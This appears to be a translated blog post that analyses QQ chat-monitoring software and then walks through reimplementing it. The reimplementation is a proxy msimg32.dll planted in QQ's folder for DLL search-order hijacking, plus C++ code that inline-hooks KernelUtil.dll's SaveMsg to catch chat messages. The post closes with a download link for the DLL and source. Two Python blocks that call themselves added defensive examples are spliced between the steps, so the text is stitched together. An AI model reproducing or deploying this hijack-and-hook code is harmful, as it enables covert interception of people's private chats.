QQ computer monitoring software 8.21

Source: Internet
Author: User

Disclaimer: the program in this post is for learning purposes only and must not be used for illegal purposes; otherwise you bear the consequences yourself. It has nothing to do with me!
I will not crack it this time; I will only analyze how it works.
 
After installation, load and run it in OllyDbg (OD). After some debugging:

Smass copies im32.dll and msimg32.dll from its own installation directory into the QQ program directory. Because msimg32.dll is a system DLL that QQ imports, it is loaded when QQ runs, and the loader picks the copy in the program directory before the one in the system directory. So we open msimg32.dll in IDA to see what it does.

 
Open im32.dll in IDA to see what im32.dll does:

In fact, im32.dll hooks KernelUtil.dll and transfers control to sub_10001000 in msimg32.dll. The following is an analysis of sub_10001000:
 
 
After the above analysis, we know the principle of this software:
1. Copy the self-compiled msimg32.dll and im32.dll into the QQ directory.
2. When QQ.exe runs, it loads the msimg32.dll in its own directory first, instead of the msimg32.dll in the system directory.
3. The msimg32.dll in the QQ directory loads the msimg32.dll from the system directory plus im32.dll, and re-implements (forwards) the interface of the original msimg32.dll.
4. Once im32.dll is loaded, it hooks the KernelUtil.dll function ?SaveMsg@Msg@Util@YAHPB_WKKKPAUITXMsgPack@PAUITXData@Z and redirects it to sub_10001000.
5. In sub_10001000, the chat message is sent to the Lou Yue client via FindWindow and SendMessage.
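The loader behaviour behind steps 2 and 3, together with the triage check a defender would run over a process's module list, as an added Python example (this is not code from the post or from the monitoring software). The directory layout, the KnownDLLs subset and the module list are constructed for illustration; the assumption that msimg32.dll is not a KnownDLL (and therefore follows the normal search order) is mine, not the post's.

```python
"""Added example (not from the post): a model of the Windows DLL search order and a
loaded-module triage check for search-order hijacking / proxy DLLs.
All paths, file lists and the KnownDLLs subset are constructed for illustration."""
import ntpath

SYSTEM_DIR = r"C:\Windows\System32"
APP_DIR = r"C:\Program Files\Tencent\QQ\Bin"   # constructed application directory

# Constructed subset of HKLM\...\Session Manager\KnownDLLs. Assumption for this
# example: msimg32.dll is not a KnownDLL, so it is subject to the normal search order.
KNOWN_DLLS = {"kernel32.dll", "user32.dll", "gdi32.dll", "advapi32.dll"}

# Constructed view of the filesystem: which files exist in which directory.
FILES = {
    SYSTEM_DIR: {"msimg32.dll", "kernel32.dll", "user32.dll", "gdi32.dll"},
    APP_DIR: {"qq.exe", "msimg32.dll", "im32.dll", "kernelutil.dll", "kernel32.dll"},
}


def resolve_dll(name, app_dir, files=FILES, known_dlls=KNOWN_DLLS, system_dir=SYSTEM_DIR):
    """Return the path the loader would pick for a bare DLL name (no path given).

    Order modelled (SafeDllSearchMode on): KnownDLLs are always mapped from the
    system directory; otherwise the application directory is searched before the
    system directory. Later steps (Windows directory, current directory, PATH)
    are left out because they do not change the outcome for this case.
    """
    name = name.lower()
    if name in known_dlls:
        return ntpath.join(system_dir, name)
    for directory in (app_dir, system_dir):
        if name in files.get(directory, set()):
            return ntpath.join(directory, name)
    return None


def find_shadowed_system_dlls(loaded_modules, files=FILES, system_dir=SYSTEM_DIR):
    """Flag modules whose file name exists in the system directory but which were
    loaded from elsewhere. One finding per module: name, actual and expected path."""
    system_names = {n.lower() for n in files.get(system_dir, set())}
    findings = []
    for path in loaded_modules:
        base = ntpath.basename(path).lower()
        directory = ntpath.dirname(path)
        if base in system_names and ntpath.normcase(directory) != ntpath.normcase(system_dir):
            findings.append({"module": base, "loaded_from": directory,
                             "expected": ntpath.join(system_dir, base)})
    return findings


if __name__ == "__main__":
    # Constructed module list, as a process-listing tool would report it for QQ.exe.
    modules = [ntpath.join(APP_DIR, "qq.exe"), ntpath.join(SYSTEM_DIR, "kernel32.dll"),
               ntpath.join(APP_DIR, "msimg32.dll"), ntpath.join(APP_DIR, "im32.dll")]
    for dll in ("msimg32.dll", "kernel32.dll"):
        print(dll, "->", resolve_dll(dll, APP_DIR))
    for finding in find_shadowed_system_dlls(modules):
        print("shadowed:", finding)
```

The interesting contrast is kernel32.dll versus msimg32.dll: both have a copy planted in the application directory, but only the non-KnownDLL one resolves there. On a real machine the same check is done by comparing a process's module paths (Process Explorer, `listdlls`, or a memory dump) against the system directory, which is exactly where a planted msimg32.dll stands out.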
 
Now that the principle is known, you can implement it yourself.
1. Create a DLL project named msimg32.
2. Implement the interface of the system msimg32.dll:
#include <windows.h>
// CString and _T() come from MFC/ATL, which the author's project uses.

typedef void (WINAPI *_vSetDdrawflag)();
typedef BOOL (WINAPI *_AlphaBlend)(HDC hdcDest, int xoriginDest, int yoriginDest, int wDest,
    int hDest, HDC hdcSrc, int xoriginSrc, int yoriginSrc, int wSrc, int hSrc, BLENDFUNCTION ftn);
typedef BOOL (WINAPI *_DllInitialize)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved);
typedef BOOL (WINAPI *_GradientFill)(HDC hdc, PTRIVERTEX pVertex, ULONG nVertex, PVOID pMesh, ULONG nMesh, ULONG ulMode);
typedef BOOL (WINAPI *_TransparentBlt)(HDC hdcDest, int xoriginDest, int yoriginDest, int wDest, int hDest,
    HDC hdcSrc, int xoriginSrc, int yoriginSrc, int wSrc, int hSrc, UINT crTransparent);

// Pointers to the real exports in the system msimg32.dll; the proxy forwards to these.
_vSetDdrawflag  g_p_vSetDdrawflag  = NULL;
_AlphaBlend     g_p_AlphaBlend     = NULL;
_DllInitialize  g_p_DllInitialize  = NULL;
_GradientFill   g_p_GradientFill   = NULL;
_TransparentBlt g_p_TransparentBlt = NULL;

BOOL InitDll()
{
    CString strSysDir;
    GetSystemDirectoryEx(strSysDir);          // author's wrapper around GetSystemDirectory(); not shown in the post
    strSysDir.AppendFormat(_T("\\msimg32.dll"));

    // Load the real msimg32.dll from the system directory and resolve its exports.
    HMODULE hDll = LoadLibrary(strSysDir);
    if (NULL != hDll)
    {
        g_p_vSetDdrawflag = (_vSetDdrawflag)GetProcAddress(hDll, "vSetDdrawflag");
        g_p_AlphaBlend    = (_AlphaBlend)GetProcAddress(hDll, "AlphaBlend");
        g_p_DllInitialize = (_DllInitialize)GetProcAddress(hDll, "DllInitialize");
        g_p_GradientFill  = (_GradientFill)GetProcAddress(hDll, "GradientFill");
        g_p_TransparentBlt = (_TransparentBlt)GetProcAddress(hDll, "TransparentBlt");
    }

    // Succeed only if every forwarded export was resolved.
    return (
        (NULL != g_p_vSetDdrawflag) && (NULL != g_p_AlphaBlend) &&
        (NULL != g_p_DllInitialize) && (NULL != g_p_GradientFill) &&
        (NULL != g_p_TransparentBlt)
    );
}
3. Hook the KernelUtil.dll function ?SaveMsg@Msg@Util@YAHPB_WKKKPAUITXMsgPack@PAUITXData@Z:
typedef int (WINAPI *_SaveMsg)(DWORD, DWORD);
typedef int (WINAPI *_GetMsgAbstract)(DWORD, DWORD);

DWORD           g_dwRetAddr        = 0;     // where to resume in the original SaveMsg, just past the patched bytes
_SaveMsg        g_p_SaveMsg        = NULL;
_GetMsgAbstract g_p_GetMsgAbstract = NULL;

// DLL_NAME_OF_CRACK (the KernelUtil.dll name), LEN_OF_CRACK (the number of
// prologue bytes overwritten), the JmpCode union and GetMachineCode() are
// defined elsewhere in the author's project and are not shown in the post.
void WINAPI Bob_SaveMsg(int a1, const wchar_t *Format, const wchar_t *a3, const wchar_t *a4, int a5, int a6);

__declspec(naked) void JmpFun()
{
    __asm
    {
        pushfd
        pushad

        push dword ptr [ebp + 0x1c]     // parameter 6
        push dword ptr [ebp + 0x18]     // parameter 5
        push dword ptr [ebp + 0x14]     // parameter 4
        push dword ptr [ebp + 0x10]     // parameter 3
        push dword ptr [ebp + 0x0c]     // parameter 2
        push dword ptr [ebp + 0x8]      // parameter 1
        call Bob_SaveMsg

        popad
        popfd

        // Original prologue of SaveMsg, as seen in IDA:
        // .text:3182BA70 push ebp
        // .text:3182BA71 mov ebp, esp
        // .text:3182BA73 push 0FFFFFFFFh
        // .text:3182BA75 push offset loc_3185F4A8   // the address of the bounce
        // .text:3182BA7A mov eax, large fs:0
        // .text:3182BA80 push eax
        // .text:3182BA81 sub esp, 38h
        // .text:3182BA84 push ebx
        // .text:3182BA85 push esi
        // .text:3182BA86 push edi

        // Re-execute the instructions that the jmp overwrote, then resume.
        push ebp
        mov ebp, esp
        push 0x0FFFFFFFF

        jmp g_dwRetAddr
    }
}

BOOL BobHook()
{
    BOOL bRet = FALSE;
    HMODULE hDll = LoadLibraryW(DLL_NAME_OF_CRACK);
    if (NULL != hDll)
    {
        g_p_SaveMsg = (_SaveMsg)GetProcAddress(hDll, "?SaveMsg@Msg@Util@YAHPB_WKKKPAUITXMsgPack@PAUITXData@Z");
        g_p_GetMsgAbstract = (_GetMsgAbstract)GetProcAddress(hDll, "?GetMsgAbstract@Msg@Util@YA?AVCTXStringW@PAUITXMsgPack@Z");
        if (NULL != g_p_SaveMsg && NULL != g_p_GetMsgAbstract)
        {
            DWORD dwTemp, dwOldFlag, dwCrack = (DWORD)g_p_SaveMsg;
            g_dwRetAddr = dwCrack + LEN_OF_CRACK;
            if (VirtualProtect((LPVOID)dwCrack, LEN_OF_CRACK, PAGE_READWRITE, &dwOldFlag))
            {
                JmpCode struJmp;
                struJmp.byJmpCode[3] = 0x0e9;                           // jmp rel32 opcode
                struJmp.dwJmpCode[1] = GetMachineCode(dwCrack, JmpFun); // displacement to JmpFun
                bRet = WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwCrack, &(struJmp.byJmpCode[3]), LEN_OF_CRACK, &dwTemp);
                VirtualProtect((LPVOID)dwCrack, LEN_OF_CRACK, dwOldFlag, &dwTemp);
            }
        }
    }

    return bRet;
}
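A defender's counterpart to the inline hook in step 3, as an added Python example (this is not the post's code): it compares a function's on-disk prologue with its in-memory bytes, decodes an E9 rel32 jump and checks whether the destination lies inside the module that owns the function. The function address and the prologue bytes are the ones in the post's disassembly; the module bounds, the hook destination 0x10001000 (the post's sub_10001000 in msimg32.dll) and the patched byte string are constructed for this example.

```python
"""Added example (not from the post): detect a 5-byte E9 inline jump hook on a
function prologue and decode where it goes. The function address and prologue
bytes follow the post's disassembly; the module bounds and the hooked byte
string are constructed."""
import struct

FUNC_ADDR = 0x3182BA70                      # SaveMsg address from the post's listing
MODULE_RANGE = (0x31800000, 0x31900000)     # constructed [start, end) of KernelUtil.dll

# On-disk prologue from the listing: push ebp / mov ebp,esp / push 0FFFFFFFFh
ORIGINAL_PROLOGUE = bytes.fromhex("558BEC6AFF")
# Constructed in-memory bytes after hooking: jmp rel32 to 0x10001000 (sub_10001000)
HOOKED_PROLOGUE = bytes.fromhex("E98B557DDE")


def decode_rel_jmp(code, at_addr):
    """Return the absolute target if `code` starts with E9 rel32 located at at_addr, else None."""
    if len(code) < 5 or code[0] != 0xE9:
        return None
    rel = struct.unpack("<i", code[1:5])[0]          # signed 32-bit displacement
    return (at_addr + 5 + rel) & 0xFFFFFFFF           # relative to the next instruction


def check_prologue(func_addr, disk_bytes, memory_bytes, module_range):
    """Compare on-disk and in-memory prologue; report whether it was patched,
    the jmp target (if the patch is a jmp) and whether that target lies inside
    the module that owns the function. A target outside the module is the
    signature of a hook installed by another DLL."""
    n = len(disk_bytes)
    report = {"patched": memory_bytes[:n] != disk_bytes[:n],
              "jmp_target": None, "target_in_module": None}
    if report["patched"]:
        target = decode_rel_jmp(memory_bytes, func_addr)
        if target is not None:
            report["jmp_target"] = target
            report["target_in_module"] = module_range[0] <= target < module_range[1]
    return report


if __name__ == "__main__":
    for label, mem in (("clean", ORIGINAL_PROLOGUE), ("hooked", HOOKED_PROLOGUE)):
        r = check_prologue(FUNC_ADDR, ORIGINAL_PROLOGUE, mem, MODULE_RANGE)
        print(label, {k: (hex(v) if isinstance(v, int) and not isinstance(v, bool) else v)
                      for k, v in r.items()})
```

On a live system the on-disk bytes come from the DLL file (RVA of the export, read through the PE section table) and the in-memory bytes from the process; the comparison is the same. A patched prologue whose jump lands in a different module, here a msimg32.dll loaded from the application directory, is the finding this post's technique would produce.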
4. Output the chat information:
void WINAPI Bob_SaveMsg(int a1, const wchar_t *Format, const wchar_t *a3, const wchar_t *a4, int a5, int a6)
{
    if (NULL == g_p_GetMsgAbstract)
    {
        DbgOutput(_T("In Bob_SaveMsg(), g_p_GetMsgAbstract is NULL..."));   // DbgOutput: author's debug-print helper
        return;
    }

    // Only debug information is shown here; the chat data itself is not printed.
    static int nCount = 1;
    DbgOutput(_T("In Bob_SaveMsg(), nCount: %d..."), nCount++);
}
 
After compiling msimg32.dll, you also need to modify its export table so that the ordinals and names in the export table match those of the system msimg32.dll.

Put the modified msimg32.dll in the QQ installation directory and run QQ:
 


 
I opened the legendary QQ Manager and ran QQ:

 
Here I want to rant a bit: QQ is too insecure, and QQ Manager is too weak. If I had written some destructive code into msimg32.dll, then...


Dll and source code:

http://www.bkjia.com/uploadfile/2012/0302/20120302105338340.rar
Author guxinyi
